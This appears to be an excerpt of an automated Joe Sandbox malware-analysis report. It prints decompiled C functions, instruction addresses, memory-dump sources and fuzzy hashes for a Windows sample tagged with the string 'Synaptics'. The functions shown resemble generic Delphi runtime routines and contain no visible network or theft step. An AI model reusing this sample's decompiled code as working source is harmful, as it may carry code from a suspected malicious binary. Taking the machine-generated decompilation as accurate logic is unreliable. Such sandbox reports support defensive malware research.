                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeHandleLibraryModuleProcessTextWindow
                                                                                                                                                                                          • String ID: Synaptics
                                                                                                                                                                                          • API String ID: 2052215520-3686610856
                                                                                                                                                                                          • Opcode ID: 23035334f0471ea544dc042ab760a4b30e9010fcb46511d7fcc70af470f31b59
                                                                                                                                                                                          • Instruction ID: 1a9909b2316def5c1965b3fef8bb08763797a0688fe4a030ce65c386f667cfb5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 23035334f0471ea544dc042ab760a4b30e9010fcb46511d7fcc70af470f31b59
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0C9746001418FC200EB6ED88280577B1BB693053028277FD518B3F7DA38BC188B9F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00420288 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00420288(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v20;
				void* _v21;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr* _t116;
				intOrPtr _t127;
				intOrPtr _t162;
				void* _t191;
				void* _t192;
				intOrPtr _t218;
				void* _t231;
				void* _t232;
				void* _t233;
				intOrPtr _t234;

				_t230 = __esi;
				_t229 = __edi;
				_t232 = _t233;
				_t234 = _t233 + 0xffffffd0;
				_v48 = 0;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v12 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t234;
				E00420670(0);
				_v16 = 0;
				_t116 =  *0x49e84c; // 0x0
				 *((intOrPtr*)( *_t116 + 0x14))( *[fs:eax], 0x4205a3, _t232, __edi, __esi, __ebx, _t231);
				 *[fs:eax] = _t234;
				 *[fs:eax] = _t234;
				_t189 =  *_v8;
				 *((intOrPtr*)( *_v8 + 0x24))( *[fs:eax], 0x420542, _t232,  *[fs:eax], 0x420581, _t232);
				_t235 = _v12;
				if(_v12 != 0) {
					_v16 = _v12;
					E00420694(_v8,  &_v20,  &_v40, __eflags);
					__eflags =  *(_v16 + 0x1c) & 0x00000010;
					if(__eflags == 0) {
						 *(_v16 + 0x1c) =  *(_v16 + 0x1c) | 0x00000001;
						_t127 = _v16;
						_t41 = _t127 + 0x1c;
						 *_t41 =  *(_t127 + 0x1c) | 0x00000002;
						__eflags =  *_t41;
						E00420694(_v8,  &_v20,  &_v52, __eflags);
						E00420228(_v52,  &_v48, __eflags);
						 *((intOrPtr*)( *_v16 + 0x18))();
					} else {
						E00420694(_v8,  &_v20,  &_v44, __eflags);
					}
				} else {
					E00420694(_v8,  &_v20,  &_v32, _t235);
					_v16 =  *((intOrPtr*)(E0041A398(_v32, __edi, _t235) + 0x2c))();
					E00420694(_v8, 0,  &_v36, _t235);
					 *((intOrPtr*)( *_v16 + 0x18))();
				}
				 *((intOrPtr*)(_v8 + 0x18)) = _v16;
				 *((intOrPtr*)(_v8 + 0x74)) = E0041A0E8(_t189, E00403B34(_v16), 1, _t229, _t230, 1);
				_push(_t232);
				_push(0x4204e7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t234;
				 *((intOrPtr*)(_v8 + 0x1c)) = _v16;
				_v28 =  *((intOrPtr*)(E00406CDC() + 8));
				if(_v28 == 0) {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403BBC(1);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = _v28;
				}
				_push(_t232);
				_push(0x4204c7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t234;
				if(E0041ACC8( *((intOrPtr*)(_v8 + 0x34)),  *((intOrPtr*)(_v8 + 0x18))) < 0) {
					E0041AB10( *((intOrPtr*)(_v8 + 0x34)),  *((intOrPtr*)(_v8 + 0x18)));
				}
				 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_v8 + 0x18));
				 *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) =  *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) | 0x00000001;
				 *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) =  *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) | 0x00000002;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x18)))) + 0x14))();
				 *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) =  *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) & 0x0000fffd;
				if(_v28 == 0) {
					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)) + 8)) - 1;
					if(_t191 >= 0) {
						_t192 = _t191 + 1;
						_v20 = 0;
						do {
							 *((intOrPtr*)( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0x34)), _v20))) + 0xc))();
							_v20 = _v20 + 1;
							_t192 = _t192 - 1;
						} while (_t192 != 0);
					}
				}
				_pop(_t218);
				 *[fs:eax] = _t218;
				_push(E004204CE);
				if(_v28 == 0) {
					E00403BEC( *((intOrPtr*)(_v8 + 0x34)));
				}
				_t162 = _v8;
				 *((intOrPtr*)(_t162 + 0x34)) = 0;
				return _t162;
			}

























                                                                                                                                                                                          0x00420288
                                                                                                                                                                                          0x00420288
                                                                                                                                                                                          0x00420289
                                                                                                                                                                                          0x0042028b
                                                                                                                                                                                          0x00420293
                                                                                                                                                                                          0x00420296
                                                                                                                                                                                          0x00420299
                                                                                                                                                                                          0x0042029c
                                                                                                                                                                                          0x0042029f
                                                                                                                                                                                          0x004202a2
                                                                                                                                                                                          0x004202a5
                                                                                                                                                                                          0x004202a8
                                                                                                                                                                                          0x004202b6
                                                                                                                                                                                          0x004202bc
                                                                                                                                                                                          0x004202c3
                                                                                                                                                                                          0x004202c6
                                                                                                                                                                                          0x004202cd
                                                                                                                                                                                          0x004202db
                                                                                                                                                                                          0x004202e9
                                                                                                                                                                                          0x004202f5
                                                                                                                                                                                          0x004202f7
                                                                                                                                                                                          0x004202fa
                                                                                                                                                                                          0x004202fe
                                                                                                                                                                                          0x00420338
                                                                                                                                                                                          0x00420341
                                                                                                                                                                                          0x00420349
                                                                                                                                                                                          0x0042034d
                                                                                                                                                                                          0x0042035f
                                                                                                                                                                                          0x00420364
                                                                                                                                                                                          0x00420367
                                                                                                                                                                                          0x00420367
                                                                                                                                                                                          0x00420367
                                                                                                                                                                                          0x00420372
                                                                                                                                                                                          0x0042037d
                                                                                                                                                                                          0x0042038a
                                                                                                                                                                                          0x0042034f
                                                                                                                                                                                          0x00420355
                                                                                                                                                                                          0x00420355
                                                                                                                                                                                          0x00420300
                                                                                                                                                                                          0x00420306
                                                                                                                                                                                          0x0042031a
                                                                                                                                                                                          0x00420323
                                                                                                                                                                                          0x00420330
                                                                                                                                                                                          0x00420330
                                                                                                                                                                                          0x00420393
                                                                                                                                                                                          0x004203b1
                                                                                                                                                                                          0x004203b6
                                                                                                                                                                                          0x004203b7
                                                                                                                                                                                          0x004203bc
                                                                                                                                                                                          0x004203bf
                                                                                                                                                                                          0x004203c8
                                                                                                                                                                                          0x004203d6
                                                                                                                                                                                          0x004203dd
                                                                                                                                                                                          0x004203f9
                                                                                                                                                                                          0x004203df
                                                                                                                                                                                          0x004203e5
                                                                                                                                                                                          0x004203e5
                                                                                                                                                                                          0x004203fe
                                                                                                                                                                                          0x004203ff
                                                                                                                                                                                          0x00420404
                                                                                                                                                                                          0x00420407
                                                                                                                                                                                          0x0042041d
                                                                                                                                                                                          0x0042042b
                                                                                                                                                                                          0x0042042b
                                                                                                                                                                                          0x00420439
                                                                                                                                                                                          0x00420442
                                                                                                                                                                                          0x0042044d
                                                                                                                                                                                          0x0042045d
                                                                                                                                                                                          0x00420466
                                                                                                                                                                                          0x0042046f
                                                                                                                                                                                          0x0042047a
                                                                                                                                                                                          0x0042047d
                                                                                                                                                                                          0x0042047f
                                                                                                                                                                                          0x00420480
                                                                                                                                                                                          0x00420487
                                                                                                                                                                                          0x00420497
                                                                                                                                                                                          0x0042049a
                                                                                                                                                                                          0x0042049d
                                                                                                                                                                                          0x0042049d
                                                                                                                                                                                          0x00420487
                                                                                                                                                                                          0x0042047d
                                                                                                                                                                                          0x004204a2
                                                                                                                                                                                          0x004204a5
                                                                                                                                                                                          0x004204a8
                                                                                                                                                                                          0x004204b1
                                                                                                                                                                                          0x004204b9
                                                                                                                                                                                          0x004204b9
                                                                                                                                                                                          0x004204be
                                                                                                                                                                                          0x004204c3
                                                                                                                                                                                          0x004204c6

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b53c0b7bdad44c6d0a102dbd4fa7cd47b2996f22b94a09b9ea022614a4874783
                                                                                                                                                                                          • Instruction ID: 6b8c5d59d0500db58c792ca75e43332bd253decdef6cb283f1a9cf438713ac24
                                                                                                                                                                                          • Opcode Fuzzy Hash: b53c0b7bdad44c6d0a102dbd4fa7cd47b2996f22b94a09b9ea022614a4874783
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E81C474A00218EFCB04DF99D59199DBBF5FF48304B6185AAE800AB762D738EE41DF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041A984 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E0041A984(void* __eax, void* __ebx, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v264;
				intOrPtr _t17;
				void* _t29;
				void* _t31;
				intOrPtr _t42;
				void* _t47;
				void* _t50;
				void* _t52;

				_v8 = 0;
				_t47 = __eax;
				_push(_t50);
				_push(0x41aa1a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffefc;
				_t52 = _t47 -  *0x419504; // 0x419550
				if(_t52 != 0) {
					_t17 = _a4;
					_t53 = __eax -  *((intOrPtr*)(_t17 - 8));
					if(__eax !=  *((intOrPtr*)(_t17 - 8))) {
						E0041A984(E00403B78(__eax), 0, _t47, _a4);
						E00403B3C(_t47,  &_v264);
						E00404C24( &_v8,  &_v264, _t53);
						_push(_v8);
						_t29 = E00405FDC(E00405F8C());
						_pop(_t31); // executed
						E0041A81C(_t31, _t29); // executed
					}
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(E0041AA21);
				return E004049C0( &_v8);
			}












                                                                                                                                                                                          0x0041a991
                                                                                                                                                                                          0x0041a994
                                                                                                                                                                                          0x0041a998
                                                                                                                                                                                          0x0041a999
                                                                                                                                                                                          0x0041a99e
                                                                                                                                                                                          0x0041a9a1
                                                                                                                                                                                          0x0041a9a6
                                                                                                                                                                                          0x0041a9ac
                                                                                                                                                                                          0x0041a9ae
                                                                                                                                                                                          0x0041a9b1
                                                                                                                                                                                          0x0041a9b4
                                                                                                                                                                                          0x0041a9c1
                                                                                                                                                                                          0x0041a9d1
                                                                                                                                                                                          0x0041a9df
                                                                                                                                                                                          0x0041a9e7
                                                                                                                                                                                          0x0041a9ef
                                                                                                                                                                                          0x0041a9fc
                                                                                                                                                                                          0x0041a9fd
                                                                                                                                                                                          0x0041aa02
                                                                                                                                                                                          0x0041a9b4
                                                                                                                                                                                          0x0041aa06
                                                                                                                                                                                          0x0041aa09
                                                                                                                                                                                          0x0041aa0c
                                                                                                                                                                                          0x0041aa19

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 08ed78235a24c4537ac198cd0a66423632a65f44f5dbaa99e4930db308d6c191
                                                                                                                                                                                          • Instruction ID: d87d816c7c3a755ac75558ac3d2b79de7aa5bb6878c768e23c55ffc8dd9f9a07
                                                                                                                                                                                          • Opcode Fuzzy Hash: 08ed78235a24c4537ac198cd0a66423632a65f44f5dbaa99e4930db308d6c191
                                                                                                                                                                                          • Instruction Fuzzy Hash: F801D671701518AFCB00EFA9D9928DEB7E8EF44348B11447AF404E7252DB7CAF90CA99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A694 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                          			E0045A694(void* __eax, void* __edx) {
				intOrPtr* _v8;
				void* _t14;
				void* _t17;
				intOrPtr* _t19;
				intOrPtr* _t20;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t32;

				_v8 = _t20;
				_t30 = __eax;
				_t19 =  *((intOrPtr*)(__edx - 0xc))();
				 *_v8 = _t19;
				 *[fs:eax] = _t32;
				 *((intOrPtr*)( *_t19 + 0x2c))( *[fs:eax], 0x45a6d2, _t31);
				_t14 = 0;
				_pop(_t26);
				 *[fs:eax] = _t26;
				if( *((intOrPtr*)(__eax + 0x44)) == 0) {
					_t27 =  *0x450210; // 0x45025c
					_t14 = E00403D78(_t19, _t27);
					if(0 != 0) {
						_t29 = _t19;
						_t17 = E004416E0(_t29);
						 *((intOrPtr*)(_t30 + 0x44)) = _t29;
						return _t17;
					}
				}
				return _t14;
			}














                                                                                                                                                                                          0x0045a69b
                                                                                                                                                                                          0x0045a6a0
                                                                                                                                                                                          0x0045a6a7
                                                                                                                                                                                          0x0045a6ac
                                                                                                                                                                                          0x0045a6b9
                                                                                                                                                                                          0x0045a6c5
                                                                                                                                                                                          0x0045a6c8
                                                                                                                                                                                          0x0045a6ca
                                                                                                                                                                                          0x0045a6cd
                                                                                                                                                                                          0x0045a6ec
                                                                                                                                                                                          0x0045a6f0
                                                                                                                                                                                          0x0045a6f6
                                                                                                                                                                                          0x0045a6fd
                                                                                                                                                                                          0x0045a6ff
                                                                                                                                                                                          0x0045a703
                                                                                                                                                                                          0x0045a708
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a708
                                                                                                                                                                                          0x0045a6fd
                                                                                                                                                                                          0x0045a710

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4052f9d2b940c642c142aeb51d1d5ed65baffcfebfbdc702655652bbd84ec9c4
                                                                                                                                                                                          • Instruction ID: 7e764960b41fc8d50b9e2e4f57757535fcd4ab0498bc792cb3adf6735c5f4678
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4052f9d2b940c642c142aeb51d1d5ed65baffcfebfbdc702655652bbd84ec9c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 980121313047009FD3208F6AD88481AFBE9FF8D362B21027AF808C3B91D635AC158A59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041AA2C Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E0041AA2C(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v13;
				char _v14;
				intOrPtr* _t13;
				void* _t21;
				char _t22;
				void* _t27;
				void* _t30;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;

				_t35 = __esi;
				_t27 = __ebx;
				_t37 = _t38;
				_t39 = _t38 + 0xfffffff4;
				_v12 = __edx;
				_v8 = __eax;
				_t13 =  *0x49e84c; // 0x0
				 *((intOrPtr*)( *_t13 + 0x14))(_t36);
				_push(_t37);
				_push(0x41aada);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39;
				_t33 =  *0x41aaec; // 0x0
				_v14 = _t33 == ( *(_v8 + 0x1c) &  *0x41aae8);
				if(_v14 != 0) {
					E0041A8A0();
				}
				_push(_t37);
				_push(0x41aabb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39;
				_t21 = E00403B34(_v8); // executed
				_t22 = E0041A984(_t21, _t27, _t35, _t37); // executed
				_v13 = _t22;
				if(_v14 != 0) {
					E0041A8F8();
				}
				_pop(_t34);
				_pop(_t30);
				 *[fs:eax] = _t34;
				_push(E0041AAC2);
				_t44 = _v14;
				if(_v14 != 0) {
					return E0041A928(_t30, _t34, _t44);
				}
				return 0;
			}



















                                                                                                                                                                                          0x0041aa2c
                                                                                                                                                                                          0x0041aa2c
                                                                                                                                                                                          0x0041aa2d
                                                                                                                                                                                          0x0041aa2f
                                                                                                                                                                                          0x0041aa32
                                                                                                                                                                                          0x0041aa35
                                                                                                                                                                                          0x0041aa38
                                                                                                                                                                                          0x0041aa3f
                                                                                                                                                                                          0x0041aa44
                                                                                                                                                                                          0x0041aa45
                                                                                                                                                                                          0x0041aa4a
                                                                                                                                                                                          0x0041aa4d
                                                                                                                                                                                          0x0041aa5e
                                                                                                                                                                                          0x0041aa68
                                                                                                                                                                                          0x0041aa70
                                                                                                                                                                                          0x0041aa72
                                                                                                                                                                                          0x0041aa72
                                                                                                                                                                                          0x0041aa79
                                                                                                                                                                                          0x0041aa7a
                                                                                                                                                                                          0x0041aa7f
                                                                                                                                                                                          0x0041aa82
                                                                                                                                                                                          0x0041aa89
                                                                                                                                                                                          0x0041aa8e
                                                                                                                                                                                          0x0041aa94
                                                                                                                                                                                          0x0041aa9b
                                                                                                                                                                                          0x0041aa9d
                                                                                                                                                                                          0x0041aa9d
                                                                                                                                                                                          0x0041aaa4
                                                                                                                                                                                          0x0041aaa6
                                                                                                                                                                                          0x0041aaa7
                                                                                                                                                                                          0x0041aaaa
                                                                                                                                                                                          0x0041aaaf
                                                                                                                                                                                          0x0041aab3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041aab5
                                                                                                                                                                                          0x0041aaba

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b58eebf4ec00281f8770e321eb48ecabaf07d5c7079b70e9b6134b8be9205b3b
                                                                                                                                                                                          • Instruction ID: 83435756b267cc56ef0527e5773a61669ec16c01c49072b142c7f330bfb00c71
                                                                                                                                                                                          • Opcode Fuzzy Hash: b58eebf4ec00281f8770e321eb48ecabaf07d5c7079b70e9b6134b8be9205b3b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 07012630601284AEDB12FFA5C9116DDBFF8EF09704F9584A6F400426A1D6395DE0C61F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004045C4 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2cb3a6cdacff41b7ecbae53b36e203073edb292a1c78f0b9e480f1db04bccd11
                                                                                                                                                                                          • Instruction ID: f7c3943724ba43c609a58c6de3d79b89b9e31c002ee06463d4949cc27b2d666d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cb3a6cdacff41b7ecbae53b36e203073edb292a1c78f0b9e480f1db04bccd11
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF05B713056056FA3114E47D991913F79CFBD57603558877DA08D3690D639E8118568
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404624 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5f42c0f4a514953166bfeee57a28b562aa2de630f9d144713b1cb6bd43439c69
                                                                                                                                                                                          • Instruction ID: f96838add36a82c5312433076ab2cfee2bbefe0d1a5c041c596b6eec55ecb526
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f42c0f4a514953166bfeee57a28b562aa2de630f9d144713b1cb6bd43439c69
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF0E9B22046115FD3219F9EED90923B798F7DB7503550877E604E3660F63B9C108559
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00421D84 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00421D84(intOrPtr* __eax) {
				intOrPtr* _t7;
				signed short _t13;
				intOrPtr _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;

				_t7 = __eax;
				_t24 = __eax;
				while(1) {
					_t17 =  *((intOrPtr*)(_t24 + 0x10));
					if( *((intOrPtr*)(_t24 + 0x10)) == 0) {
						break;
					}
					_t23 = E0041AD54(_t17);
					__eflags =  *(_t23 + 0x1d) & 0x00000001;
					if(( *(_t23 + 0x1d) & 0x00000001) != 0) {
						L3:
						E00421D4C(_t24, _t23);
					} else {
						_t13 =  *0x421dd8; // 0x210
						_t21 =  *0x421dd8; // 0x210
						__eflags = _t21 - (_t13 &  *(_t24 + 0x1c));
						if(__eflags != 0) {
							E00421CCC(_t24, _t23, __eflags);
						} else {
							goto L3;
						}
					}
					_t7 =  *((intOrPtr*)( *_t23 - 4))();
				}
				return _t7;
			}








                                                                                                                                                                                          0x00421d84
                                                                                                                                                                                          0x00421d87
                                                                                                                                                                                          0x00421dcd
                                                                                                                                                                                          0x00421dcd
                                                                                                                                                                                          0x00421dd2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00421d92
                                                                                                                                                                                          0x00421d94
                                                                                                                                                                                          0x00421d98
                                                                                                                                                                                          0x00421db0
                                                                                                                                                                                          0x00421db4
                                                                                                                                                                                          0x00421d9a
                                                                                                                                                                                          0x00421d9a
                                                                                                                                                                                          0x00421da4
                                                                                                                                                                                          0x00421dab
                                                                                                                                                                                          0x00421dae
                                                                                                                                                                                          0x00421dbf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00421dae
                                                                                                                                                                                          0x00421dca
                                                                                                                                                                                          0x00421dca
                                                                                                                                                                                          0x00421dd7

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
